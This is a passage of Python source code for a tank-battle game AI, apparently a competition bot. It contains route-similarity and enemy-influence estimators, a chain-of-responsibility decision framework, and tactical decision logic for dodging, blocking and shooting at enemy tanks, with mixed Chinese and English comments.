leadingLength) if battler.is_in_enemy_site(): # 在敌方半边地图,更倾向于不防御 if leadingLength >= 1: status = Status.AGGRESSIVE elif leadingLength < -3: status = Status.DEFENSIVE else: status = Status.STALEMENT else: # # 在我方半边地盘,会增加防御的可能性 # 差一步都要算作防御! # if leadingLength >= 1: status = Status.AGGRESSIVE # [1, +) elif -1 < leadingLength < 1: status = Status.STALEMENT # (-1, 1) -> 0 elif -2 <= leadingLength <= -1: status = Status.DEFENSIVE # [-2, -1] else: if allow_withdraw and battler.is_in_our_site(include_midline=True): # 包含中线,放松一点条件 status = Status.WITHDRAW # (-, -2) else: status = Status.DEFENSIVE # 否则不要撤退? if strict: # 严格模式直接返回评估状态 return status # # 撤退性状态直接返回 # if status == Status.WITHDRAW: return status # # 尽可能用攻击性策略! 
    #
    # Also check whether the opponent's attacking route could be blocked by our
    # teammate; otherwise this evaluation would be over-defensive.
    # 5ce69a15d2337e01c7a90646
    #
    if status != Status.AGGRESSIVE:
        map_ = battler._map
        tank = battler.tank
        teammate = None
        for _tank in map_.tanks[tank.side]:
            if _tank is not tank:
                teammate = _tank
                break
        if not teammate.destroyed:
            teammateBattler = BattleTank(teammate)
            for action in teammateBattler.get_all_valid_move_actions() + [ Action.STAY ]:
                with map_.simulate_one_action(teammateBattler, action):
                    if teammateBattler.xy in oppRoute: # teammate can sit on the enemy's route,
                        return Status.AGGRESSIVE       # so treat the situation as aggressive

    return status


def estimate_route_similarity(route1, route2):
    """
    Estimate the similarity of two routes.

    Typically used to judge whether choosing a certain route is likely to
    lead to an encounter with the enemy.

    Implementation
    --------------
    Take the shorter of the two routes. For each of its points, find the
    point on the other route with the smallest Manhattan distance and add
    that distance, weighted by the point's weight, to a running total. The
    final score is the reciprocal of
    ``total / (number of points on the shorter route) + 1``.

    A value close to 1 means the routes are very similar; a value close to 0
    means they are very different. As the concrete scenario requires, the
    extra points of the longer route are simply ignored.

    TODO:
    ------
    1. How should coordinate weights be taken into account?
    2. How should the extra points of the longer route be handled?

    Input:
        - route1   Route
        - route2   Route

    Return:
        - similarity   float   in (0, 1]
    """
    route1 = [ (node.x, node.y, node.weight) for node in route1 ]
    route2 = [ (node.x, node.y, node.weight) for node in route2 ]

    if len(route1) > len(route2): # ensure route1 has no more points than route2
        route1, route2 = route2, route1

    total = 0
    for x1, y1, weight in route1:
        d = np.min([ get_manhattan_distance(x1, y1, x2, y2) for x2, y2, _ in route2 ])
        total += d * weight

    return 1 / ( total / len(route1) + 1 )


def estimate_enemy_effect_on_route(route, player):
    """
    Estimate how strongly the enemies affect the attacking route we chose.
    ----------------------------------------------------------------------
    Enemies on either side of an attacking route may hinder the attack, i.e.
    increase the number of turns that route takes. Their influence can thus
    be quantified as an increment of the route length. Adding the theoretical
    route length and the increments caused by enemy influence yields an
    estimate of the "real" route length; re-ranking the candidate routes by
    this value selects a route that is both short and least affected by the
    enemies.

    How is the enemy influence estimated?
    -------------------------------------
    Collect the coordinates the enemy can currently influence (roughly: the
    squares it can shoot at). To be closer to the real situation, further
    assume the enemy can shoot this turn and simulate every action it can
    take (moves and shots — shots are included because they may destroy brick
    walls), collecting the influenced coordinates after each. The region
    covered by this coordinate set is regarded as under enemy influence.
    Then count how much the current route overlaps with this set (route nodes
    whose coordinates fall inside the set count as overlapping); the more
    such nodes, the larger the influence, i.e. the overlap count correlates
    positively with the route-length increment — which gives the quantitative
    estimate.

    In particular, an enemy standing directly on the route causes a large
    length increment, sometimes effectively marking the route as impassable.

    TODO:
    ---------
    This simple static analysis may misjudge some concrete situations. When
    our tank reaches the point of the route where it must face the enemy, it
    can sometimes simply dodge past, in which case the influence is small; in
    other cases it can only dodge backwards, which effectively makes the
    route a dead end (5cd24632a51e681f0e912613) — and special tactics, such
    as destroying a wall two squares ahead in advance, can even turn such a
    dead end into a passable route. A static analysis cannot distinguish
    these cases, so a gap to the truly accurate estimate remains. A dynamic
    analysis, however, is impractical: it would require continuous simulated
    moves and simulated decisions, which is both too slow and very hard to
    implement correctly (multi-turn rollback plus reusing the real decision
    code for simulated decisions would be a huge undertaking).

    Input:
        - route    Route         the route to evaluate
        - player   Tank2Player   the player who would take this route
    """
    map_ = player._map # access the global map object through the player

    LENGTH_INCREMENT_OF_ENEMY_INFLUENCED = 1  # route length increment caused by enemy fire
    LENGTH_INCREMENT_OF_ENEMY_BLOCKING = 10   # route length increment caused by an enemy on the route

    enemyInfluencedPoints = set() # coordinates influenced by the enemy
    enemyBlockingPoints = set()   # coordinates blocked by the enemy

    for oppBattler in [ oppPlayer.battler for oppPlayer in player.opponents ]:
        if oppBattler.destroyed:
            continue
        with map_.simulate_one_action(oppBattler, Action.STAY): # refresh the shooting cooldown
            for action in oppBattler.get_all_valid_actions(): # includes staying in place
                with map_.simulate_one_action(oppBattler, action):
                    with map_.simulate_one_action(oppBattler, Action.STAY): # refresh the cooldown likewise
                        enemyBlockingPoints.add( oppBattler.xy )   # blocking
                        enemyInfluencedPoints.add( oppBattler.xy ) # add the enemy's own position first
                        for dx, dy in get_searching_directions(*oppBattler.xy):
                            x, y = oppBattler.xy
                            while True:
                                x += dx
                                y += dy
                                if not map_.in_map(x, y):
                                    break
                                fields = map_[x, y]
                                if len(fields) == 0: # empty square
                                    pass
                                elif len(fields) > 1: # two or more tanks: not counted as influenced, stop searching
                                    break
                                else:
                                    field = fields[0]
                                    if isinstance(field, EmptyField):
                                        pass
                                    elif isinstance(field, WaterField):
                                        continue # water neither blocks bullets nor counts as influenced itself
                                    #elif isinstance(field, (BaseField, BrickField, SteelField, TankField) ):
                                    else:
                                        break # a blocking field type: not counted as influenced, stop searching
                                enemyInfluencedPoints.add( (x, y) ) # branches ending with `pass` finally reach here

    realLength = route.length # start from the theoretical route length

    for node in route:
        xy = node.xy
        if xy in enemyInfluencedPoints:
            if node.weight > 0: # a shot's transition point has weight == 0 and is in fact not affected by enemy fire
                realLength += LENGTH_INCREMENT_OF_ENEMY_INFLUENCED
        if xy in enemyBlockingPoints: # an enemy blocking the route also affects shooting points, so treat all nodes alike
            realLength += LENGTH_INCREMENT_OF_ENEMY_BLOCKING

    return realLength


def estimate_route_blocking(route):
    """
    Estimate the number of blocking fields on a route.
    ----------------------------------------------------
    Used to evaluate withdrawal routes. Withdrawal happens around our own
    base, where walls should not be attacked too aggressively, otherwise the
    base's defense would be weakened.

    Implementation
    --------------
    Increase the weight of block-type fields so that routes containing more
    blocks get a larger estimated length.

    TODO: should blocks be evaluated further on routes containing the same
    number of blocks, i.e. should blocks on the base's immediate perimeter be
    given a higher weight?
    """
    x2, y2 = route.end

    LENGTH_INCREMENT_OF_BLOCK = 1           # a wall on the route: weight + 1
    LENGTH_INCREMENT_OF_INNERMOST_BLOCK = 2 # a wall of the innermost ring: weight + 2

    realLength = route.length

    for node in route:
        x1, y1 = node.xy
        if node.weight == 2: # a node with weight 2 is necessarily a block-type field
            if np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1: # on the immediate perimeter of `end`
                realLength += LENGTH_INCREMENT_OF_INNERMOST_BLOCK
            else:
                realLength += LENGTH_INCREMENT_OF_BLOCK

    return realLength

#{ END 'strategy/evaluate.py' }#



#{ BEGIN 'decision/abstract.py' }#

class DecisionMaker(object):
    """
    Abstract base class for anything capable of making a decision.
    --------------------------------------------------------------
    This covers concrete deciders such as Team and Player as well as abstract
    decision classes. A derived class encapsulates one specific piece of
    decision code; if the derived class is a decision class, this splits the
    decision logic into units, keeping the decision tree readable and the
    logic reusable.
    """
    UNHANDLED_RESULT = None

    def __init__(self, *args, **kwargs):
        if self.__class__ is __class__:
            raise NotImplementedError

    def is_handled(self, result):
        """
        Judge (from the outside) whether `result` indicates that this decision
        applies to the current situation.

        By convention, a decision object that cannot handle the situation
        returns __class__.UNHANDLED_RESULT, so comparing the actual return
        value against it is sufficient.
        """
        return result != self.__class__.UNHANDLED_RESULT

    def _make_decision(self):
        """
        The real abstract decision hook, overridden by derived classes.

        If the situation does not apply, simply return nothing (the function
        returns None by default); make_decision uses that to detect an
        unhandled case.
        """
        raise NotImplementedError

    def make_decision(self):
        """
        Public decision interface.
        --------------------------
        Applies uniform post-processing to the result of _make_decision, and
        is also the place for pre-/post-decision hooks.

        Default handling provided here:
        -------------------------------
        - If the real decision hook returned an action, return it directly as
          the final result.
        - If the situation did not apply and the hook returned None, return
          UNHANDLED_RESULT.
        """
        res = self._make_decision()
        if res is None:
            return self.__class__.UNHANDLED_RESULT
        return res


class SingleDecisionMaker(DecisionMaker):
    """
    Abstract base class of single-player decisions, used by Tank2Player.
    """
    UNHANDLED_RESULT = Action.INVALID

    def __init__(self, player, signal):
        """
        Overridden constructor; its parameter list is kept consistent with
        the Tank2Player._make_decision interface.

        Input:
            - player   Tank2Player   single-player instance
            - signal   int           team signal
        """
        self._player = player
        self._signal = signal

        if self.__class__ is __class__:
            raise NotImplementedError


class RespondTeamSignalDecisionMaker(SingleDecisionMaker):
    """
    Decision model that responds to team signals.

    Note:
    ------------
    """
    UNHANDLED_RESULT = ( Action.INVALID, Signal.INVALID )
    HANDLED_SIGNALS = ( ) # team signals this decider will handle

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if self.__class__ is __class__:
            raise NotImplementedError

    def make_decision(self):
        """
        Normally, once the team has sent a signal, a result must be returned
        in time. UNHANDLED_RESULT is returned only when signal is None.
        """
        res = self._make_decision()
        if res is None:
            signal = self._signal
            if signal in self.__class__.HANDLED_SIGNALS: # a team signal must be responded to
                raise Exception("team signal %d must be responded" % signal)
            return self.__class__.UNHANDLED_RESULT
        return res


class TeamDecisionMaker(DecisionMaker):
    """
    Abstract base class of team decisions, used by Tank2Team for two players.

    Unlike SingleDecision, a TeamDecision has no single "best" decider: every
    team decider attempts a decision. Deciders have priorities; once a
    high-priority decider has coordinated a player's action, a lower-priority
    decider should not override that existing result (save for very special
    deciders).

    When several team deciders are chained with DecisionChain, every decider
    on the chain is guaranteed to run once.
    """
    def __init__(self, team):
        self._team = team # Tank2Team

        if self.__class__ is __class__:
            raise NotImplementedError

    def is_handled(self, result):
        """
        Overridden to suit DecisionChain-style decisions: DecisionChain
        always continues to the next decider, no matter what.
        """
        return False

    def _make_decision(self, *args, **kwargs):
        """
        Overridden by derived classes; the return value must be [int, int].
        """
        raise NotImplementedError
        return [ Action.INVALID, Action.INVALID ]

    def make_decision(self):
        """
        Overrides the make_decision interface to keep player1's and player2's
        stored decisions in sync with the returned result after deciding —
        mainly in case create_snapshot was forgotten during decision making ...
        """
        team = self._team
        player1, player2 = team.players
        action1, action2 = self._make_decision()
        player1.set_current_decision(action1)
        player2.set_current_decision(action2)
        return [ action1, action2 ]

#{ END 'decision/abstract.py' }#



#{ BEGIN 'decision/chain.py' }#

class DecisionChain(DecisionMaker):
    """
    Decision chain
    --------------
    Modeled after the chain-of-responsibility pattern: combines several
    decision instances and tries them one by one in priority order.

    As soon as one decision handles the situation, its result is returned;
    otherwise the lower-priority decisions are tried in turn.
    """
    UNHANDLED_RESULT = None

    def __init__(self, *decisions):
        self._decisions = decisions
        for decision in self._decisions: # every instance must derive from DecisionMaker
            assert isinstance(decision, DecisionMaker)

    def _make_decision(self):
        for decision in self._decisions:
            res = decision.make_decision()
            if decision.is_handled(res):
                return res

#{ END 'decision/chain.py' }#



#{ BEGIN 'decision/single/leave_teammate.py' }#

class LeaveTeammateDecision(RespondTeamSignalDecisionMaker):
    """
    Handle the situation where the two teammates overlap.
    -----------------------------------------------------
    1. Try to leave the teammate with a safe move.
    2. Avoid moving in the same direction as the teammate.
    3. Prefer a direction that does not lengthen the attacking route.
    """
    HANDLED_SIGNALS = ( Signal.SHOULD_LEAVE_TEAMMATE, )

    def _make_decision(self):
        player = self._player
        signal = self._signal

        map_ = player._map
        battler = player.battler
        teammate = player.teammate

        if signal == Signal.SHOULD_LEAVE_TEAMMATE:

            actions = []
            for action in battler.get_all_valid_move_actions():
                if not Action.is_move(player.try_make_decision(action)): # risky move
                    continue
                if action == teammate.get_current_decision(): # must not move in the same direction as the teammate!
                    continue
                actions.append(action)

            if len(actions) == 0: # no reasonable way to leave ...
                return ( Action.STAY, Signal.CANHANDLED )

            route1 = battler.get_shortest_attacking_route()
            deltaLengths = {} # action -> deltaLength
            for action in actions:
                with map_.simulate_one_action(battler, action):
                    route2 = battler.get_shortest_attacking_route() # should always exist?
deltaLengths[action] = route2.length - route1.length # 移动后进攻路线短变短者值小 action = min( deltaLengths.items(), key=lambda kv: kv[1] )[0] player.set_status(Status.READY_TO_LEAVE_TEAMMATE) return ( action, Signal.READY_TO_LEAVE_TEAMMATE ) #{ END 'decision/single/leave_teammate.py' }# #{ BEGIN 'decision/single/attack_base.py' }# class AttackBaseDecision(SingleDecisionMaker): """ 特殊情况决策,当下一步就要拆掉敌方基地时 """ def _make_decision(self): player = self._player battler = player.battler # TODO: # 可能需要考虑一种特殊情况: 队友被杀,自己下一步打掉对方基地,但是对方下一步把我干掉 # 这种情况下,即使我方拆掉对方基地也算平局。也许可以考虑先闪避一回合,然后再继续拆家。 # if battler.is_face_to_enemy_base() and battler.canShoot: player.set_status(Status.READY_TO_ATTACK_BASE) # 特殊状态 return battler.get_next_attacking_action() # 必定是射击 ... #{ END 'decision/single/attack_base.py' }# #{ BEGIN 'decision/single/encount_enemy.py' }# class EncountEnemyDecision(SingleDecisionMaker): """ 遭遇敌人时的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler teammate = player.teammate Tank2Player = type(player) BattleTank = type(battler) aroundEnemies = battler.get_enemies_around() if len(aroundEnemies) > 0: player.set_status(Status.ENCOUNT_ENEMY) if len(aroundEnemies) > 1: # 两个敌人,尝试逃跑 assert len(aroundEnemies) == 2 # 可能会遇到极其罕见的三人重叠 # 首先判断是否为真正的双人夹击 enemy1, enemy2 = aroundEnemies x, y = tank.xy x1, y1 = enemy1.xy x2, y2 = enemy2.xy # 先判断敌人是否重叠,如果是,那么很有可能直接击杀! 
if (x1, y1) == (x2, y2): if (not teammate.defeated # 队友还没有死,自己可以考虑牺牲 and battler.canShoot ): player.set_status(Status.ENCOUNT_TWO_ENEMY) player.set_status(Status.READY_TO_DOUBLE_KILL_ENEMIES) player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) if x1 == x2 == x: if (y > y1 and y > y2) or (y < y1 and y < y2): player.set_status(Status.ENCOUNT_ONE_ENEMY) pass # 实际可视为一个人 elif y1 == y2 == y: if (x > x1 and x > x2) or (x < x1 and x < x2): player.set_status(Status.ENCOUNT_ONE_ENEMY) pass else: # 真正的被夹击 player.set_status(Status.ENCOUNT_TWO_ENEMY) oppBattlers = [ BattleTank(_enemy) for _enemy in aroundEnemies ] if all( oppBattler.canShoot for oppBattler in oppBattlers ): # 如果两者都有弹药,可能要凉了 ... player.set_status(Status.DYING) if battler.canShoot: # TODO: 这种情况下有选择吗? player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) # 随便打一个? elif all( not oppBattler.canShoot for oppBattler in oppBattlers ): # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向) firstMoveAction = tuple() attackAction = battler.get_next_attacking_action() if Action.is_move(attackAction): # 如果是移动行为 firstMoveAction = ( attackAction, ) for action in firstMoveAction + Action.MOVE_ACTIONS: if map_.is_valid_move_action(tank, action): with map_.simulate_one_action(tank, action): if len( battler.get_enemies_around() ) < 2: # 一个可行的闪避方向 player.set_status(Status.READY_TO_DODGE) return action # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个 if battler.canShoot: # TODO: 是否有选择? player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) # 随便打一个 else: # 有一个能射击,则反击他 for oppBattler in oppBattlers: if oppBattler.canShoot: # 找到能射击的敌人 actions = battler.try_dodge(oppBattler) if len(actions) == 0: # 不能闪避 if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) else: # 要凉了 ... 
break elif len(actions) == 1: action = player.try_make_decision(actions[0]) else: action = player.try_make_decision(actions[0], player.try_make_decision(actions[1])) if Action.is_move(action): # 统一判断 player.set_status(Status.READY_TO_DODGE) return action # 没有办法?尝试反击 if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) else: # 要凉了 break # 没有办法对付 .. player.set_status(Status.DYING) # 无所谓的办法了... return player.try_make_decision(battler.get_next_attacking_action()) # TODO: # 虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17 # 当前情况: # --------- # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架 # 2. 敌人数量为 1 # if len(aroundEnemies) == 1: oppTank = aroundEnemies[0] else: # len(aroundEnemies) == 2: oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) # # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7 # if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=2) and not Action.is_move(player.get_previous_action(back=1)) # 且不是因为我方主动打破重叠导致 ): # 上回合刚刚进入重叠,这回合就被打破 with map_.rollback_to_previous(): if oppTank is battler.get_overlapping_enemy(): oppPlayer.add_labels(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE) # # 在非 WITHDRAW 的情况下,评估当前侵略性 # if not player.has_status(Status.WITHDRAW): _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) else: status = Status.WITHDRAW # 侵略模式/僵持模式 #---------- # 1. 优先拆家 # 2. 只在必要的时刻还击 # 3. 闪避距离不宜远离拆家路线 # if status == Status.AGGRESSIVE or status == Status.STALEMENT: if not oppBattler.canShoot: # 如果能直接打死,那当然是不能放弃的!! 
if len( oppBattler.try_dodge(battler) ) == 0: # 必死 if battler.canShoot: player.set_status(Status.READY_TO_KILL_ENEMY) return battler.shoot_to(oppBattler) attackAction = battler.get_next_attacking_action() # 其他情况,优先进攻,不与其纠缠 realAction = player.try_make_decision(attackAction) # 默认的进攻路线 if Action.is_stay(realAction): # 存在风险 if Action.is_move(attackAction): # # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数 # # TODO: # 实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的, # 在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被 # 忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行 # 特殊判断 # fields = battler.get_destroyed_fields_if_shoot(attackAction) route = battler.get_shortest_attacking_route() for field in fields: if route.has_block(field): # 为 block 对象,该回合可以射击 action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.KEEP_ON_MARCHING) return action # TODO: 此时开始判断是否为基地外墙,如果是,则射击 for field in fields: if battler.check_is_outer_wall_of_enemy_base(field): action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.KEEP_ON_MARCHING) return action # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局 #--------------------------------------------------- # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。 # 后退操作必须要有限制 5cd10315a51e681f0e900fa8 # # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f # if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=3) and Action.is_stay(player.get_previous_action(back=2)) # 还需要检查两者上上回合是否为等待 and Action.is_stay(oppPlayer.get_previous_action(back=2)) # 避免将边移动边对射的情况考虑进来 and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人 and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局 ): # 判断是否为反复回头 if player.has_status_recently(Status.READY_TO_BACK_AWAY, turns=6): # 最近几回合内是否曾经回头过 player.add_labels(Label.ALWAYS_BACK_AWAY) if (player.has_label(Label.ALWAYS_BACK_AWAY) and not battler.is_in_our_site(include_midline=True) # 
严格不在我方基地 ): # 考虑用闪避的方式代替后退 for action in battler.try_dodge(oppBattler): realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY) player.remove_labels(Label.ALWAYS_BACK_AWAY) # 删掉这个状态 return realAction # 否则继续回头 backMoveAction = battler.back_away_from(oppBattler) action = player.try_make_decision(backMoveAction) if Action.is_move(action): player.set_status(Status.READY_TO_BACK_AWAY) return action if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射 and not battler.canShoot # 但是我方本回合不能射击 and not oppBattler.canShoot # 并且对方本回合不能射击 ): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持 # 其余情况照常 player.set_status(Status.PREVENT_BEING_KILLED) return realAction # 否则不予理会,直接移动或者反击 action = player.try_make_decision(battler.get_next_attacking_action()) if not Action.is_stay(action): # 补丁 #---------------------------- # 针对两者距离为 2 的情况,不能一概而论! # if status == Status.STALEMENT: # 僵持模式考虑堵路 _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 2: if not player.is_suitable_to_overlap_with_enemy(oppBattler): # 更适合堵路 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 其他情况均可以正常移动 #player.set_status(Status.KEEP_ON_MARCHING) #return action return # 直接抛出让后面的 decision 处理,当做没有这个敌人 # 不能移动,只好反击 action = player.try_make_decision(battler.shoot_to(oppBattler)) if Action.is_shoot(action): player.set_status(Status.READY_TO_FIGHT_BACK) return action else: # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1 #----------------------------- # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击 # 2. 
如果是僵持的,那么优先堵路,类似于 Defensive # # TODO: # 可能需要团队信号协调 5ccc30f7a51e681f0e8c1668 # if status == Status.STALEMENT: # # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive # # TODO: # 有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59 # 上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人 # 这种情况下直接转为侵略模式! # if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and (player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) or player.has_status_in_previous_turns(Status.KEEP_ON_OVERLAPPING, turns=1)) ): pass # 直接过到侵略模式 else: # 否则算作正常的防守 # # TODO: # 射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走! # 5ce4e66cd2337e01c7a6abd7 # if battler.canShoot: # # (inserted) 先看上回合是不是刚被对方过掉 # _justBreakOverlap = False with map_.rollback_to_previous(): if (battler.has_overlapping_enemy() and oppTank is battler.get_overlapping_enemy() ): # 刚刚被对手打破重叠 _justBreakOverlap = True _shouldShoot = False if _justBreakOverlap: # 刚刚被对手主动打破重叠 for _route in battler.get_all_shortest_attacking_routes(): if oppTank.xy in _route: # 对方现在位于我的攻击路线上,说明对方上回合是 _shouldShoot = True # 回头堵路,那么继续保持射击 break if _shouldShoot: # 正常防御 player.set_status(Status.READY_TO_BLOCK_ROAD, Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射 return battler.shoot_to(oppBattler) else: pass # 否则视为进攻逻辑 # 闪避,尝试找最佳方案 #------------------------- defenseAction = Action.STAY if battler.canShoot: defenseAction = battler.shoot_to(oppBattler) dodgeActions = battler.try_dodge(oppTank) if battler.is_in_enemy_site(): # 限制条件,只有在对方基地才开始闪现! # # 最佳方向是闪避向着进攻方向移动 # attackAction = battler.get_next_attacking_action() for action in dodgeActions: # 与进攻方向相同的方向是最好的 if Action.is_same_direction(action, attackAction): realAction = player.try_make_decision(action) # 风险评估 if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # 闪避加行军 # 没有最佳的闪避方案,仍然尝试闪避 #----------------------------- # 但是不能向着增加攻击线路长短的方向闪避! 
# route1 = battler.get_shortest_attacking_route() for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() if route2.length > route1.length: # 不能超过当前路线长度,否则就是浪费一回合 continue else: player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # # 此时还可以考虑借力 # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避 # if (len(dodgeActions) > 0 # 存在可用的闪避行为 and battler.is_in_enemy_site() # 限制为只有在对方基地才适用这个逻辑 ): _shouldDodge = False action = dodgeActions[0] enemyShootAction = oppBattler.shoot_to(battler) with outer_label() as OUTER_BREAK: with map_.simulate_one_action(battler, action): # 假设闪走 fields = oppBattler.get_destroyed_fields_if_shoot(enemyShootAction) for field in fields: if isinstance(field, BrickField): # 对手会打掉墙 for _route in battler.get_all_shortest_attacking_routes(): if field.xy in _route: # 这个块在某一个最短的攻击路线上 _shouldDodge = True raise OUTER_BREAK if _shouldDodge: for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击! 
# 5ccef443a51e681f0e8e64d8 #----------------------------------- route1 = battler.get_shortest_attacking_route() if Action.is_shoot(defenseAction): player.set_status(Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局 #-------------------------------------------- # 尝试往远处闪避,创造机会 # # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙 # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为 # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的 # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。 # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了 # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力 # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61 # if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=4) and Action.is_stay(player.get_previous_action(back=1)) # 检查对应的两个冷却回合是停止 and Action.is_stay(player.get_previous_action(back=3)) # 避免将移动对射的情况被考虑进来 and Action.is_stay(oppPlayer.get_previous_action(back=1)) and Action.is_stay(oppPlayer.get_previous_action(back=3)) and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人 and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局 ): for action in battler.try_dodge(oppBattler): if Action.is_move(action): realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.READY_TO_DODGE) # 这里还是再判断一下距离 route1 = battler.get_shortest_attacking_route() with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() if route2.length > route1.length: player.set_status(Status.WILL_DODGE_TO_LONG_WAY) return realAction # 默认是优先射击 player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) return defenseAction # 如果不能射击,那么终究还是要闪避的 # 或者是无法后方移动,为了打破僵局,尝试闪避 #---------------------------------- for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) # # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb # 为了后续能够打破这种情况,这里额外添加一个状态进行标记 # 
player.set_status(Status.WILL_DODGE_TO_LONG_WAY) return realAction if Action.is_stay(defenseAction): # # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4 # riskyEnemyBattler = player.get_risky_enemy() if (riskyEnemyBattler is not None and riskyEnemyBattler is not oppBattler and riskyEnemyBattler.xy == battler.xy ): # 这种情况下实际是没有威胁的 ... for action in dodgeActions: player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) # TODO: # 还需要判断是否向远路闪避 ... # 这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去 return action player.set_status(Status.DYING) # 否则就凉了 ... return defenseAction return Action.STAY # 防御模式 #---------- # 1. 如果对方下回合必死,那么射击 # 2. 优先堵路,距离远则尝试逼近 # 3. 必要的时候对抗 # 4. 距离远仍然优先 # # elif status == DEFENSIVE_STATUS: # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为 elif status == Status.DEFENSIVE: if not oppBattler.canShoot: if len( oppBattler.try_dodge(battler) ) == 0: if battler.canShoot: # 必死情况 player.set_status(Status.READY_TO_KILL_ENEMY) return battler.shoot_to(oppBattler) # # 不能马上打死,敌人又无法攻击 #------------------------------- # 优先堵路,根据双方距离判断 # _route = 